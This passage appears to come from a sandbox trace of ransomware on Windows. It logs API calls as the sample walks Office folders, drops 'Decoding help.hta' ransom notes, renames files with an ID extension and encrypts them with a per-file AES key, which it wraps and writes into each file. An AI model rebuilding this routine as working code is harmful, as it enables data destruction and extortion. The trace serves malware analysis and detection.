returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\*.*" [0048.751] GlobalMemoryStatus (in: lpBuffer=0x1ec5fd10 | out: lpBuffer=0x1ec5fd10) [0048.751] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11424f18, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5a4 [0048.759] CloseHandle (hObject=0x5a4) returned 1 [0048.759] FindNextFileW (in: hFindFile=0x5e3330, lpFindFileData=0x1ec5fd30 | out: lpFindFileData=0x1ec5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51767f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xbcce4400, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbcce4400, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AUTOSHAP", cAlternateFileName="")) returned 1 [0048.759] lstrcmpW (lpString1=".", lpString2="AUTOSHAP") returned -1 [0048.759] lstrcmpW (lpString1="..", lpString2="AUTOSHAP") returned -1 [0048.759] lstrcmpiW (lpString1="windows", lpString2="AUTOSHAP") returned 1 [0048.760] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*.*" [0048.760] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*.*") returned 56 [0048.760] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\", lpString2="AUTOSHAP" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" [0048.760] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\*.*" [0048.760] GlobalMemoryStatus (in: lpBuffer=0x1ec5fd10 | out: lpBuffer=0x1ec5fd10) [0048.760] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24995b58, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5a4 [0048.775] CloseHandle (hObject=0x5a4) returned 1 [0048.775] FindNextFileW (in: hFindFile=0x5e3330, lpFindFileData=0x1ec5fd30 | out: lpFindFileData=0x1ec5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5178e0b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xbd42e760, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbd42e760, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BULLETS", cAlternateFileName="")) returned 1 [0048.775] lstrcmpW (lpString1=".", lpString2="BULLETS") returned -1 [0048.775] lstrcmpW (lpString1="..", lpString2="BULLETS") returned -1 [0048.775] lstrcmpiW (lpString1="windows", lpString2="BULLETS") returned 1 [0048.775] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*.*" [0048.775] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*.*") returned 56 [0048.775] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\", lpString2="BULLETS" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" [0048.775] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\*.*" [0048.775] GlobalMemoryStatus (in: lpBuffer=0x1ec5fd10 | out: lpBuffer=0x1ec5fd10) [0048.775] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x980a5d8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5a4 [0048.782] CloseHandle (hObject=0x5a4) returned 1 [0048.782] FindNextFileW (in: hFindFile=0x5e3330, lpFindFileData=0x1ec5fd30 | out: lpFindFileData=0x1ec5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5178e0b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xbd4548c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbd4548c0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LINES", cAlternateFileName="")) returned 1 [0048.782] lstrcmpW (lpString1=".", lpString2="LINES") returned -1 [0048.783] lstrcmpW (lpString1="..", lpString2="LINES") returned -1 [0048.783] lstrcmpiW (lpString1="windows", lpString2="LINES") returned 1 [0048.785] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*.*" [0048.785] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*.*") returned 56 [0048.785] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\", lpString2="LINES" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" [0048.785] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\*.*" [0048.785] GlobalMemoryStatus (in: lpBuffer=0x1ec5fd10 | out: lpBuffer=0x1ec5fd10) [0048.785] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24a560f8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5a4 [0048.795] CloseHandle (hObject=0x5a4) returned 1 [0048.795] FindNextFileW (in: hFindFile=0x5e3330, lpFindFileData=0x1ec5fd30 | out: lpFindFileData=0x1ec5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3475600, ftCreationTime.dwHighDateTime=0x1ca9120, ftLastAccessTime.dwLowDateTime=0x596c1850, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf3475600, ftLastWriteTime.dwHighDateTime=0x1ca9120, nFileSizeHigh=0x0, nFileSizeLow=0x3da0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE10.DLL", cAlternateFileName="")) returned 1 [0048.795] lstrcpyW (in: lpString1=0x42b0868, lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*.*" [0048.795] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*.*") returned 56 [0048.795] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\Decoding help.hta" [0048.796] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\media\\office14\\decoding help.hta")) returned 0xffffffff [0048.796] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\media\\office14\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0051.416] WriteFile (in: hFile=0x2fc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1ec5fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1ec5fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0054.019] CloseHandle (hObject=0x2fc) returned 1 [0055.315] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.153] lstrcmpiW (lpString1="Decoding help.hta", lpString2="OFFICE10.DLL") returned -1 [0058.153] lstrlenW (lpString="OFFICE10.DLL") returned 12 [0058.153] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*.*" [0058.153] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*.*") returned 56 [0058.153] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\", lpString2="OFFICE10.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL" [0058.153] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL" [0058.153] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0058.153] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.154] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6d4 [0058.154] CreateFileMappingA (hFile=0x6d4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6cc [0058.154] CryptAcquireContextA (in: phProv=0x1ec5fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ec5fcec*=0x344a238) returned 1 [0060.180] CryptGenKey (in: hProv=0x344a238, Algid=0x6610, dwFlags=0x1, phKey=0x1ec5fce8 | out: phKey=0x1ec5fce8*=0x5d8990) returned 1 [0060.180] CryptExportKey (in: hKey=0x5d8990, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1ec5fbe4, pdwDataLen=0x1ec5fce4 | out: pbData=0x1ec5fbe4*, pdwDataLen=0x1ec5fce4*=0x2c) returned 1 [0060.180] MapViewOfFile (hFileMappingObject=0x6cc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3da0) returned 0x3a00000 [0062.570] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1ec5fbe4*, pdwDataLen=0x1ec5fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1ec5fbe4*, pdwDataLen=0x1ec5fcf8*=0x100) returned 1 [0062.573] CryptEncrypt (in: hKey=0x5d8990, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a00000, pdwDataLen=0x1ec5fce4*=0x3da0, dwBufLen=0x3da0 | out: pbData=0x3a00000*, pdwDataLen=0x1ec5fce4*=0x3da0) returned 1 [0062.592] UnmapViewOfFile (lpBaseAddress=0x3a00000) returned 1 [0062.594] CloseHandle (hObject=0x6cc) returned 1 [0062.595] CryptDestroyKey (hKey=0x5d8990) returned 1 [0062.595] CryptReleaseContext (hProv=0x344a238, dwFlags=0x0) returned 1 [0062.595] SetFilePointerEx (in: hFile=0x6d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.595] WriteFile (in: hFile=0x6d4, lpBuffer=0x1ec5fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1ec5fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1ec5fbe4*, lpNumberOfBytesWritten=0x1ec5fcf8*=0x100, lpOverlapped=0x0) returned 1 [0062.596] WriteFile (in: hFile=0x6d4, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1ec5fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1ec5fcf8*=0x500, lpOverlapped=0x0) returned 1 [0062.596] CloseHandle (hObject=0x6d4) returned 1 [0062.596] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0062.596] FindNextFileW (in: hFindFile=0x5e3330, lpFindFileData=0x1ec5fd30 | out: lpFindFileData=0x1ec5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x156c5e00, ftCreationTime.dwHighDateTime=0x1c07b1f, ftLastAccessTime.dwLowDateTime=0x596c1850, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x156c5e00, ftLastWriteTime.dwHighDateTime=0x1c07b1f, nFileSizeHigh=0x0, nFileSizeLow=0x78450, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE10.MMW", cAlternateFileName="")) returned 1 Thread: id = 466 os_tid = 0x8e8 [0045.315] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\*.*", lpFindFileData=0x1ed9fd30 | out: lpFindFileData=0x1ed9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdf0acac0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xdf0acac0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3370 [0045.532] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.532] FindNextFileW (in: hFindFile=0x5e3370, lpFindFileData=0x1ed9fd30 | out: lpFindFileData=0x1ed9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdf0acac0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xdf0acac0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.569] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0050.569] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0050.569] FindNextFileW (in: hFindFile=0x5e3370, lpFindFileData=0x1ed9fd30 | out: lpFindFileData=0x1ed9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4e33900, ftCreationTime.dwHighDateTime=0x1cab7ec, ftLastAccessTime.dwLowDateTime=0x14e98550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa4e33900, ftLastWriteTime.dwHighDateTime=0x1cab7ec, nFileSizeHigh=0x0, nFileSizeLow=0x53b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACCDDSUI.DLL", cAlternateFileName="")) returned 1 [0050.571] lstrcpyW (in: lpString1=0x25207c28, lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\*.*" [0050.572] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\*.*") returned 55 [0050.572] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\Decoding help.hta" [0050.572] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\decoding help.hta")) returned 0xffffffff [0050.572] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f4 [0051.604] WriteFile (in: hFile=0x5f4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1ed9fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1ed9fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0055.579] CloseHandle (hObject=0x5f4) returned 1 [0056.954] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.520] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ACCDDSUI.DLL") returned 1 [0058.520] lstrlenW (lpString="ACCDDSUI.DLL") returned 12 [0058.520] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\*.*" [0058.520] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\*.*") returned 55 [0058.520] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\", lpString2="ACCDDSUI.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL" [0058.521] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL" [0058.521] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0058.521] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accddsui.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accddsui.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.522] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accddsui.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7b0 [0058.522] CreateFileMappingA (hFile=0x7b0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x760 [0058.522] CryptAcquireContextA (in: phProv=0x1ed9fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ed9fcec*=0x2aac6e58) returned 1 [0060.231] CryptGenKey (in: hProv=0x2aac6e58, Algid=0x6610, dwFlags=0x1, phKey=0x1ed9fce8 | out: phKey=0x1ed9fce8*=0x10f144c0) returned 1 [0060.231] CryptExportKey (in: hKey=0x10f144c0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1ed9fbe4, pdwDataLen=0x1ed9fce4 | out: pbData=0x1ed9fbe4*, pdwDataLen=0x1ed9fce4*=0x2c) returned 1 [0060.231] MapViewOfFile (hFileMappingObject=0x760, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x53a0) Thread: id = 467 os_tid = 0x90c [0045.316] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036\\*.*", lpFindFileData=0x1eedfd30 | out: lpFindFileData=0x1eedfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x779e270, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x779e270, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x779e270, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e33b0 [0045.532] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.532] FindNextFileW (in: hFindFile=0x5e33b0, lpFindFileData=0x1eedfd30 | out: lpFindFileData=0x1eedfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x779e270, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x779e270, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x779e270, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.757] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.757] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.757] FindNextFileW (in: hFindFile=0x5e33b0, lpFindFileData=0x1eedfd30 | out: lpFindFileData=0x1eedfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b069000, ftCreationTime.dwHighDateTime=0x1c99227, ftLastAccessTime.dwLowDateTime=0x779e270, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2b069000, ftLastWriteTime.dwHighDateTime=0x1c99227, nFileSizeHigh=0x0, nFileSizeLow=0xaa26, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSO.ACL", cAlternateFileName="")) returned 1 [0048.757] lstrcpyW (in: lpString1=0x9af9288, lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036\\*.*" [0048.757] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036\\*.*") returned 55 [0048.757] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036\\Decoding help.hta" [0048.757] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\office14\\1036\\decoding help.hta")) returned 0xffffffff [0048.757] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\office14\\1036\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x744 [0050.036] WriteFile (in: hFile=0x744, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1eedfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1eedfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0051.656] CloseHandle (hObject=0x744) returned 1 [0052.158] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0056.699] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSO.ACL") returned -1 [0056.699] lstrlenW (lpString="MSO.ACL") returned 7 [0056.699] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036\\*.*" [0056.699] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft 